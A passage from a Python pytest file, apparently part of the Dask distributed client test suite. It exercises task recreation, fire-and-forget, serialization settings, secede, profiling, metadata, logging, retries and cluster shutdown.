c.recreate_error_locally(f)
assert f.status == "error"
def test_recreate_error_not_error(c):
f = c.submit(dec, 2)
with pytest.raises(ValueError, match="No errored futures passed"):
c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
x0 = delayed(dec)(2)
y0 = delayed(dec)(2)
x = delayed(div)(1, x0)
y = delayed(div)(1, y0)
tot = delayed(sum)([x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert f.status == "pending"
function, args, kwargs = await c._get_components_from_future(f)
assert f.status == "finished"
assert function.__name__ == "sum"
assert args == ([1, 1],)
assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
b = db.range(10, npartitions=4)
b = b.map(lambda x: int(3628800 / (x + 1)))
b = b.persist()
f = c.compute(b)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == [
3628800,
1814400,
1209600,
907200,
725760,
604800,
518400,
453600,
403200,
362880,
]
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
df2 = df.a.map(lambda x: x + 1)
f = c.compute(df2)
function, args, kwargs = await c._get_components_from_future(f)
expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
assert function(*args, **kwargs).equals(expected)
# with persist
df3 = c.persist(df2)
# recreate_task_locally only works with futures
with pytest.raises(AttributeError):
function, args, kwargs = await c._get_components_from_future(df3)
f = c.compute(df3)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
da = pytest.importorskip("dask.array")
z = (da.zeros((10, 10), chunks=10) + 1).sum()
f = c.compute(z)
function, args, kwargs = await c._get_components_from_future(f)
assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
x0 = c.submit(dec, 2)
y0 = c.submit(dec, 2)
x = c.submit(div, 1, x0)
y = c.submit(div, 1, y0)
tot = c.submit(sum, [x, y])
f = c.compute(tot)
assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
assert set(s.workers) == {a.address, b.address}
await c.retire_workers(workers=[a.address], close_workers=True)
assert set(s.workers) == {b.address}
while a.status != Status.closed:
await asyncio.sleep(0.01)
class MyException(Exception):
pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
class Foo:
def __getstate__(self):
raise MyException()
with pytest.raises(MyException):
future = c.submit(identity, Foo())
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
future = c.submit(identity, Foo())
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
class Foo:
def __getstate__(self):
return 1
def __setstate__(self, state):
raise MyException("hello")
def __call__(self, *args):
return 1
future = c.submit(Foo(), 1)
with pytest.raises(MyException):
await future
futures = c.map(inc, range(10))
results = await c.gather(futures)
assert results == list(map(inc, range(10)))
assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.1)
import distributed
def f(x):
distributed.foo = 123
try:
fire_and_forget(c.submit(f, future))
while not hasattr(distributed, "foo"):
await asyncio.sleep(0.01)
assert distributed.foo == 123
finally:
del distributed.foo
while len(s.tasks) > 1:
await asyncio.sleep(0.01)
assert set(s.who_wants) == {future.key}
assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
fire_and_forget(c.submit(div, 1, 0))
await asyncio.sleep(0.1)
# erred task should clear out quickly
start = time()
while s.tasks:
await asyncio.sleep(0.01)
assert time() < start + 1
def test_quiet_client_close(loop):
with captured_logger(logging.getLogger("distributed")) as logger:
with Client(
loop=loop,
processes=False,
dashboard_address=":0",
threads_per_worker=4,
) as c:
futures = c.map(slowinc, range(1000), delay=0.01)
sleep(0.200) # stop part-way
sleep(0.1) # let things settle
out = logger.getvalue()
lines = out.strip().split("\n")
assert len(lines) <= 2
for line in lines:
assert (
not line
or "Reconnecting" in line
or "garbage" in line
or set(line) == {"-"}
), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
with captured_logger(logging.getLogger("tornado.application")) as logger:
cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
client = Client(cluster, loop=loop)
cluster.close()
client.close()
out = logger.getvalue()
assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
c = await Client(s.address, asynchronous=True)
future = c.submit(inc, 1)
await wait(future)
assert c.id in s.wants_what
await c.close()
while c.id in s.wants_what or s.tasks:
await asyncio.sleep(0.01)
def test_threadsafe(c):
def f(_):
d = deque(maxlen=50)
for i in range(100):
future = c.submit(inc, random.randint(0, 100))
d.append(future)
sleep(0.001)
c.gather(list(d))
total = c.submit(sum, list(d))
return total.result()
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(20) as e:
results = list(e.map(f, range(20)))
assert results and all(results)
del results
@pytest.mark.slow
def test_threadsafe_get(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
total += (x + random.randint(0, 20)).sum().compute()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
with ThreadPoolExecutor(30) as e:
results = list(e.map(f, range(30)))
assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
da = pytest.importorskip("dask.array")
x = da.arange(100, chunks=(10,))
def f(_):
total = 0
for i in range(20):
future = c.compute((x + random.randint(0, 20)).sum())
total += future.result()
sleep(0.001)
return total
from concurrent.futures import ThreadPoolExecutor
e = ThreadPoolExecutor(30)
results = list(e.map(f, range(30)))
assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
assert c.id.lower().startswith("client")
assert a.id.lower().startswith("worker")
assert b.id.lower().startswith("worker")
assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
assert get_client() is c
assert c.asynchronous
def f(x):
client = get_client()
future = client.submit(inc, x)
import distributed
assert not client.asynchronous
assert client is distributed.tmp_client
return future.result()
import distributed
distributed.tmp_client = c
try:
futures = c.map(f, range(5))
results = await c.gather(futures)
assert results == list(map(inc, range(5)))
finally:
del distributed.tmp_client
def test_get_client_no_cluster():
# Clean up any global workers added by other tests. This test requires that
# there are no global workers.
Worker._instances.clear()
msg = "No global client found and no address provided"
with pytest.raises(ValueError, match=fr"^{msg}$"):
get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.arange(10, chunks=(5,)).persist()
def f(x):
assert isinstance(x, da.Array)
return x.sum().compute()
future = c.submit(f, x)
result = await future
assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
def f():
client = get_client()
secede()
return client.submit(inc, 1).result()
result = await c.submit(f)
assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
"""Ensure that tasks scheduled from a seceded thread can be scheduled
elsewhere"""
def f(x):
client = get_client()
secede()
futures = client.map(inc, range(10), pure=False)
total = client.submit(sum, futures).result()
return total
futures = c.map(f, range(10), workers=[a.address])
results = await c.gather(futures)
# We dispatch 10 tasks and every task generates 11 more tasks
# 10 * 11 + 10
assert a.executed_count + b.executed_count == 120
assert a.executed_count >= 10
assert b.executed_count > 0
assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
def func():
client = get_client()
f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
client.gather(f)
future = c.submit(func, key="f")
while len(s.tasks) != 2:
await asyncio.sleep(0.001)
# lower values schedule first
assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
s.tasks["f"].priority,
s.tasks["slowinc"].priority,
)
def test_get_client_sync(c, s, a, b):
results = c.run(lambda: get_worker().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
results = c.run(lambda: get_client().scheduler.address)
assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = await c.scatter(ddf)
ddf2 = await future
df2 = await c.compute(ddf2)
assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
pd = pytest.importorskip("pandas")
dd = pytest.importorskip("dask.dataframe")
from dask.dataframe.utils import assert_eq
df = pd.DataFrame({"x": [1, 2, 3]})
ddf = dd.from_pandas(df, npartitions=2).persist()
future = c.scatter(ddf)
result = future.result()
assert_eq(result.compute(), df)
assert future.type == dd.DataFrame
assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
if delay == "random":
sleep(random.random() / 2)
else:
sleep(delay)
if x > 4:
return 4
secede()
client = get_client()
futures = client.map(
_dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
)
total = client.submit(sum, futures)
return total.result()
def test_dynamic_workloads_sync(c):
future = c.submit(_dynamic_workload, 0, delay=0.02)
assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
future = c.submit(_dynamic_workload, 0, delay="random")
assert future.result(timeout=20) == 52
@pytest.mark.xfail(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
key = b"inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is bytes
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
uni_type = str
key = "inc-123"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
uni_type = str
key = "inc-123\u03bc"
future = c.submit(inc, 1, key=key)
result = await future
assert type(future.key) is uni_type
assert set(s.tasks) == {key}
assert key in a.data or key in b.data
assert result == 2
future2 = c.submit(inc, future)
result2 = await future2
assert result2 == 3
future3 = await c.scatter({"data-123": 123})
result3 = await future3["data-123"]
assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
async def f():
x = await c.scatter(123)
y = c.submit(inc, x)
z = await c.gather(y)
return z
z = sync(loop, f)
assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
loop = loop_in_thread
with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
with captured_logger("distributed.comm") as sio:
with Client(cluster, loop=loop) as client:
futures = client.map(lambda x: x + 1, range(10))
sleep(0.05)
cluster.close()
sleep(0.05)
text = sio.getvalue()
assert not text
def test_warn_executor(loop, s, a, b):
with warnings.catch_warnings(record=True) as record:
with Executor(s["address"], loop=loop) as c:
pass
assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
x = c.submit(slowdec, 1, delay=0.5)
future = c.submit(slowinc, 1, delay=0.5)
await asyncio.sleep(0.1)
results = await asyncio.gather(
c.call_stack(future), c.call_stack(keys=[future.key])
)
assert all(list(first(result.values())) == [future.key] for result in results)
assert results[0] == results[1]
result = results[0]
ts = a.tasks.get(future.key)
if ts is not None and ts.state == "executing":
w = a
else:
w = b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
future = c.submit(slowinc, 1, delay=0.8)
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.01)
result = await c.call_stack()
w = a if a.executing_count else b
assert list(result) == [w.address]
assert list(result[w.address]) == [future.key]
assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack(x)
assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
while not a.executing_count and not b.executing_count:
await asyncio.sleep(0.001)
result = await c.call_stack()
assert result
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
await wait(futures)
x = await c.profile(start=time() + 10, stop=time() + 20)
assert not x["count"]
x = await c.profile(start=0, stop=time())
assert (
x["count"]
== sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
)
y = await c.profile(start=time() - 0.300, stop=time())
assert 0 < y["count"] < x["count"]
assert not any(p["count"] for _, p in b.profile_history)
result = await c.profile(workers=b.address)
assert not result["count"]
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile_keys(c, s, a, b):
x = c.map(slowinc, range(10), delay=0.05, workers=a.address)
y = c.map(slowdec, range(10), delay=0.05, workers=a.address)
await wait(x + y)
xp = await c.profile("slowinc")
yp = await c.profile("slowdec")
p = await c.profile()
assert p["count"] == xp["count"] + yp["count"]
with captured_logger(logging.getLogger("distributed")) as logger:
prof = await c.profile("does-not-exist")
assert prof == profile.create()
out = logger.getvalue()
assert not out
@gen_cluster()
async def test_client_with_name(s, a, b):
with captured_logger("distributed.scheduler") as sio:
client = await Client(s.address, asynchronous=True, name="foo")
assert "foo" in client.id
await client.close()
text = sio.getvalue()
assert "foo" in text
@gen_cluster(client=True)
async def test_future_defaults_to_default_client(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
future = Future(x.key)
assert future.client is c
@gen_cluster(client=True)
async def test_future_auto_inform(c, s, a, b):
x = c.submit(inc, 1)
await wait(x)
client = await Client(s.address, asynchronous=True)
future = Future(x.key, client)
while future.status != "finished":
await asyncio.sleep(0.01)
await client.close()
def test_client_async_before_loop_starts():
with pristine_loop() as loop:
client = Client(asynchronous=True, loop=loop)
assert client.asynchronous
client.close()
@pytest.mark.slow
@gen_cluster(client=True, Worker=Nanny, timeout=60, nthreads=[("127.0.0.1", 3)] * 2)
async def test_nested_compute(c, s, a, b):
def fib(x):
assert get_worker().get_current_task()
if x < 2:
return x
a = delayed(fib)(x - 1)
b = delayed(fib)(x - 2)
c = a + b
return c.compute()
future = c.submit(fib, 8)
result = await future
assert result == 21
assert len(s.transition_log) > 50
@gen_cluster(client=True)
async def test_task_metadata(c, s, a, b):
await c.set_metadata("x", 1)
result = await c.get_metadata("x")
assert result == 1
future = c.submit(inc, 1)
key = future.key
await wait(future)
await c.set_metadata(key, 123)
result = await c.get_metadata(key)
assert result == 123
del future
while key in s.tasks:
await asyncio.sleep(0.01)
with pytest.raises(KeyError):
await c.get_metadata(key)
result = await c.get_metadata(key, None)
assert result is None
await c.set_metadata(["x", "a"], 1)
result = await c.get_metadata("x")
assert result == {"a": 1}
await c.set_metadata(["x", "b"], 2)
result = await c.get_metadata("x")
assert result == {"a": 1, "b": 2}
result = await c.get_metadata(["x", "a"])
assert result == 1
await c.set_metadata(["x", "a", "c", "d"], 1)
result = await c.get_metadata("x")
assert result == {"a": {"c": {"d": 1}}, "b": 2}
@gen_cluster(client=True, Worker=Nanny)
async def test_logs(c, s, a, b):
await wait(c.map(inc, range(5)))
logs = await c.get_scheduler_logs(n=5)
assert logs
for _, msg in logs:
assert "distributed.scheduler" in msg
w_logs = await c.get_worker_logs(n=5)
assert set(w_logs.keys()) == {a.worker_address, b.worker_address}
for log in w_logs.values():
for _, msg in log:
assert "distributed.worker" in msg
n_logs = await c.get_worker_logs(nanny=True)
assert set(n_logs.keys()) == {a.worker_address, b.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
n_logs = await c.get_worker_logs(nanny=True, workers=[a.worker_address])
assert set(n_logs.keys()) == {a.worker_address}
for log in n_logs.values():
for _, msg in log:
assert "distributed.nanny" in msg
@gen_cluster(client=True)
async def test_avoid_delayed_finalize(c, s, a, b):
x = delayed(inc)(1)
future = c.compute(x)
result = await future
assert result == 2
assert list(s.tasks) == [future.key] == [x.key]
@gen_cluster()
async def test_config_scheduler_address(s, a, b):
with dask.config.set({"scheduler-address": s.address}):
with captured_logger("distributed.client") as sio:
c = await Client(asynchronous=True)
assert c.scheduler.address == s.address
text = sio.getvalue()
assert s.address in text
await c.close()
@gen_cluster(client=True)
async def test_warn_when_submitting_large_values(c, s, a, b):
with warnings.catch_warnings(record=True) as record:
future = c.submit(lambda x: x + 1, b"0" * 2000000)
text = str(record[0].message)
assert "2.00 MB" in text or "1.91 MiB" in text
assert "large" in text
assert "..." in text
assert "'000" in text
assert "000'" in text
assert len(text) < 2000
with warnings.catch_warnings(record=True) as record:
data = b"0" * 2000000
for i in range(10):
future = c.submit(lambda x, y: x, data, i)
assert len(record) < 2
@gen_cluster(client=True)
async def test_unhashable_function(c, s, a, b):
func = _UnhashableCallable()
result = await c.submit(func, 1)
assert result == 2
@gen_cluster()
async def test_client_name(s, a, b):
with dask.config.set({"client-name": "hello-world"}):
c = await Client(s.address, asynchronous=True)
assert any("hello-world" in name for name in list(s.clients))
await c.close()
def test_client_doesnt_close_given_loop(loop_in_thread, s, a, b):
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 1).result() == 2
with Client(s["address"], loop=loop_in_thread) as c:
assert c.submit(inc, 2).result() == 3
@gen_cluster(client=True, nthreads=[])
async def test_quiet_scheduler_loss(c, s):
c._periodic_callbacks["scheduler-info"].interval = 10
with captured_logger(logging.getLogger("distributed.client")) as logger:
await s.close()
await c._update_scheduler_info()
text = logger.getvalue()
assert "BrokenPipeError" not in text
def test_dashboard_link(loop, monkeypatch):
monkeypatch.setenv("USER", "myusername")
with cluster(scheduler_kwargs={"dashboard_address": ":12355"}) as (s, [a, b]):
with Client(s["address"], loop=loop) as c:
with dask.config.set(
{"distributed.dashboard.link": "{scheme}://foo-{USER}:{port}/status"}
):
link = "http://foo-myusername:12355/status"
assert link == c.dashboard_link
text = c._repr_html_()
assert link in text
@gen_test()
async def test_dashboard_link_inproc():
async with Client(processes=False, asynchronous=True, dashboard_address=":0") as c:
with dask.config.set({"distributed.dashboard.link": "{host}"}):
assert "/" not in c.dashboard_link
@gen_test()
async def test_client_timeout_2():
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
start = time()
c = Client("127.0.0.1:3755", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
stop = time()
assert c.status == "closed"
await c.close()
assert stop - start < 1
@gen_test()
async def test_client_active_bad_port():
import tornado.httpserver
import tornado.web
application = tornado.web.Application([(r"/", tornado.web.RequestHandler)])
http_server = tornado.httpserver.HTTPServer(application)
http_server.listen(8080)
with dask.config.set({"distributed.comm.timeouts.connect": "10ms"}):
c = Client("127.0.0.1:8080", asynchronous=True)
with pytest.raises((TimeoutError, IOError)):
await c
await c._close(fast=True)
http_server.stop()
@pytest.mark.parametrize("direct", [True, False])
def test_turn_off_pickle(direct):
@gen_cluster()
async def test(s, a, b):
np = pytest.importorskip("numpy")
async with Client(
s.address, asynchronous=True, serializers=["dask", "msgpack"]
) as c:
assert (await c.submit(inc, 1)) == 2
await c.submit(np.ones, 5)
await c.scatter(1)
# Can't send complex data
with pytest.raises(TypeError):
future = await c.scatter(inc)
# can send complex tasks (this uses pickle regardless)
future = c.submit(lambda x: x, inc)
await wait(future)
# but can't receive complex results
with pytest.raises(TypeError):
await c.gather(future, direct=direct)
# Run works
result = await c.run(lambda: 1)
assert list(result.values()) == [1, 1]
result = await c.run_on_scheduler(lambda: 1)
assert result == 1
# But not with complex return values
with pytest.raises(TypeError):
await c.run(lambda: inc)
with pytest.raises(TypeError):
await c.run_on_scheduler(lambda: inc)
test()
@gen_cluster()
async def test_de_serialization(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(
s.address,
asynchronous=True,
serializers=["msgpack", "pickle"],
deserializers=["msgpack"],
)
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_de_serialization_none(s, a, b):
np = pytest.importorskip("numpy")
c = await Client(s.address, asynchronous=True, deserializers=["msgpack"])
try:
# Can send complex data
future = await c.scatter(np.ones(5))
# But can not retrieve it
with pytest.raises(TypeError):
result = await future
finally:
await c.close()
@gen_cluster()
async def test_client_repr_closed(s, a, b):
c = await Client(s.address, asynchronous=True)
await c.close()
c._repr_html_()
def test_client_repr_closed_sync(loop):
with Client(loop=loop, processes=False, dashboard_address=":0") as c:
pass
c._repr_html_()
@pytest.mark.xfail(reason="https://github.com/dask/dask/pull/6807")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)])
async def test_nested_prioritization(c, s, w):
x = delayed(inc)(1, dask_key_name=("a", 2))
y = delayed(inc)(2, dask_key_name=("a", 10))
o = dask.order.order(merge(x.__dask_graph__(), y.__dask_graph__()))
fx, fy = c.compute([x, y])
await wait([fx, fy])
assert (o[x.key] < o[y.key]) == (
s.tasks[stringify(fx.key)].priority < s.tasks[stringify(fy.key)].priority
)
@gen_cluster(client=True)
async def test_scatter_error_cancel(c, s, a, b):
# https://github.com/dask/distributed/issues/2038
def bad_fn(x):
raise Exception("lol")
x = await c.scatter(1)
y = c.submit(bad_fn, x)
del x
await wait(y)
assert y.status == "error"
await asyncio.sleep(0.1)
assert y.status == "error" # not cancelled
@pytest.mark.parametrize("workers_arg", [False, True])
@pytest.mark.parametrize("direct", [False, True])
@pytest.mark.parametrize("broadcast", [False, True, 10])
@gen_cluster(client=True, nthreads=[("", 1)] * 10)
async def test_scatter_and_replicate_avoid_paused_workers(
c, s, *workers, workers_arg, direct, broadcast
):
paused_workers = [w for i, w in enumerate(workers) if i not in (3, 7)]
for w in paused_workers:
w.memory_pause_fraction = 1e-15
while any(s.workers[w.address].status != Status.paused for w in paused_workers):
await asyncio.sleep(0.01)
f = await c.scatter(
{"x": 1},
workers=[w.address for w in workers[1:-1]] if workers_arg else None,
broadcast=broadcast,
direct=direct,
)
if not broadcast:
await c.replicate(f, n=10)
expect = [i in (3, 7) for i in range(10)]
actual = [("x" in w.data) for w in workers]
assert actual == expect
@pytest.mark.xfail(reason="GH#5409 Dask-Default-Threads are frequently detected")
def test_no_threads_lingering():
if threading.active_count() < 40:
return
active = dict(threading._active)
print(f"==== Found {len(active)} active threads: ====")
for t in active.values():
print(t)
assert False
@gen_cluster()
async def test_direct_async(s, a, b):
c = await Client(s.address, asynchronous=True, direct_to_workers=True)
assert c.direct_to_workers
await c.close()
c = await Client(s.address, asynchronous=True, direct_to_workers=False)
assert not c.direct_to_workers
await c.close()
def test_direct_sync(c):
assert not c.direct_to_workers
def f():
return get_client().direct_to_workers
assert c.submit(f).result()
@gen_cluster()
async def test_mixing_clients(s, a, b):
c1 = await Client(s.address, asynchronous=True)
c2 = await Client(s.address, asynchronous=True)
future = c1.submit(inc, 1)
with pytest.raises(ValueError):
c2.submit(inc, future)
assert not c2.futures # Don't create Futures on second Client
await c1.close()
await c2.close()
@gen_cluster(client=True)
async def test_tuple_keys(c, s, a, b):
x = dask.delayed(inc)(1, dask_key_name=("x", 1))
y = dask.delayed(inc)(x, dask_key_name=("y", 1))
future = c.compute(y)
assert (await future) == 3
@gen_cluster(client=True)
async def test_multiple_scatter(c, s, a, b):
futures = await asyncio.gather(*(c.scatter(1, direct=True) for _ in range(5)))
x = await futures[0]
x = await futures[0]
@gen_cluster(client=True)
async def test_map_large_kwargs_in_graph(c, s, a, b):
np = pytest.importorskip("numpy")
x = np.random.random(100000)
futures = c.map(lambda a, b: a + b, range(100), b=x)
while not s.tasks:
await asyncio.sleep(0.01)
assert len(s.tasks) == 101
assert any(k.startswith("ndarray") for k in s.tasks)
@gen_cluster(client=True)
async def test_retry(c, s, a, b):
def f():
assert dask.config.get("foo")
with dask.config.set(foo=False):
future = c.submit(f)
with pytest.raises(AssertionError):
await future
with dask.config.set(foo=True):
await future.retry()
await future
@gen_cluster(client=True)
async def test_retry_dependencies(c, s, a, b):
def f():
return dask.config.get("foo")
x = c.submit(f)
y = c.submit(inc, x)
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
await y.retry()
await x.retry()
result = await y
assert result == 101
@gen_cluster(client=True)
async def test_released_dependencies(c, s, a, b):
def f(x):
return dask.config.get("foo") + 1
x = c.submit(inc, 1, key="x")
y = c.submit(f, x, key="y")
del x
with pytest.raises(KeyError):
await y
with dask.config.set(foo=100):
await y.retry()
result = await y
assert result == 101
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_profile_bokeh(c, s, a, b):
pytest.importorskip("bokeh.plotting")
from bokeh.model import Model
await c.gather(c.map(slowinc, range(10), delay=0.2))
state, figure = await c.profile(plot=True)
assert isinstance(figure, Model)
with tmpfile("html") as fn:
try:
await c.profile(filename=fn)
except PermissionError:
if WINDOWS:
pytest.xfail()
assert os.path.exists(fn)
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable(c, s, a, b):
future = c.submit(add, 1, 2)
subgraph = SubgraphCallable(
{"_2": (add, "_0", "_1"), "_3": (add, future, "_2")}, "_3", ("_0", "_1")
)
dsk = {"a": 1, "b": 2, "c": (subgraph, "a", "b"), "d": (subgraph, "c", "b")}
future2 = c.get(dsk, "d", sync=False)
result = await future2
assert result == 11
# Nested subgraphs
subgraph2 = SubgraphCallable(
{
"_2": (subgraph, "_0", "_1"),
"_3": (subgraph, "_2", "_1"),
"_4": (add, "_3", future2),
},
"_4",
("_0", "_1"),
)
dsk2 = {"e": 1, "f": 2, "g": (subgraph2, "e", "f")}
result = await c.get(dsk2, "g", sync=False)
assert result == 22
@gen_cluster(client=True)
async def test_get_mix_futures_and_SubgraphCallable_dask_dataframe(c, s, a, b):
dd = pytest.importorskip("dask.dataframe")
import pandas as pd
df = pd.DataFrame({"x": range(1, 11)})
ddf = dd.from_pandas(df, npartitions=2).persist()
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
ddf = ddf.map_partitions(lambda x: x)
ddf["x"] = ddf["x"].astype("f8")
result = await c.compute(ddf)
assert result.equals(df.astype("f8"))
def test_direct_to_workers(s, loop):
with Client(s["address"], loop=loop, direct_to_workers=True) as client:
future = client.scatter(1)
future.result()
resp = client.run_on_scheduler(lambda dask_scheduler: dask_scheduler.events)
assert "gather" not in str(resp)
@gen_cluster(client=True)
async def test_instances(c, s, a, b):
assert list(Client._instances) == [c]
assert list(Scheduler._instances) == [s]
assert set(Worker._instances) == {a, b}
@gen_cluster(client=True)
async def test_wait_for_workers(c, s, a, b):
future = asyncio.ensure_future(c.wait_for_workers(n_workers=3))
await asyncio.sleep(0.22) # 2 chances
assert not future.done()
w = await Worker(s.address)
start = time()
await future
assert time() < start + 1
await w.close()
with pytest.raises(TimeoutError) as info:
await c.wait_for_workers(n_workers=10, timeout="1 ms")
assert "2/10" in str(info.value).replace(" ", "")
assert "1 ms" in str(info.value)
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@pytest.mark.asyncio
@pytest.mark.parametrize("Worker", [Worker, Nanny])
async def test_file_descriptors_dont_leak(Worker):
pytest.importorskip("pandas")
df = dask.datasets.timeseries(freq="10s", dtypes={"x": int, "y": float})
proc = psutil.Process()
before = proc.num_fds()
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address), Worker(s.address), Client(
s.address, asynchronous=True
):
assert proc.num_fds() > before
await df.sum().persist()
start = time()
while proc.num_fds() > before:
await asyncio.sleep(0.01)
assert time() < start + 10, (before, proc.num_fds())
@gen_test()
async def test_dashboard_link_cluster():
class MyCluster(LocalCluster):
@property
def dashboard_link(self):
return "http://foo.com"
async with MyCluster(
processes=False, asynchronous=True, dashboard_address=":0"
) as cluster:
async with Client(cluster, asynchronous=True) as client:
assert "http://foo.com" in client._repr_html_()
@gen_test()
async def test_shutdown():
async with Scheduler(dashboard_address=":0") as s:
async with Worker(s.address) as w:
async with Client(s.address, asynchronous=True) as c:
await c.shutdown()
assert s.status == Status.closed
assert w.status == Status.closed
@pytest.mark.asyncio
async def test_shutdown_localcluster(cleanup):
async with LocalCluster(
n_workers=1, asynchronous=True, processes=False, dashboard_address=":0"
) as lc:
async with Client(lc, asynchronous=True) as c:
await c.shutdown()
assert lc.scheduler.status == Status.closed
@gen_test()
async def test_config_inherited_by_subprocess():
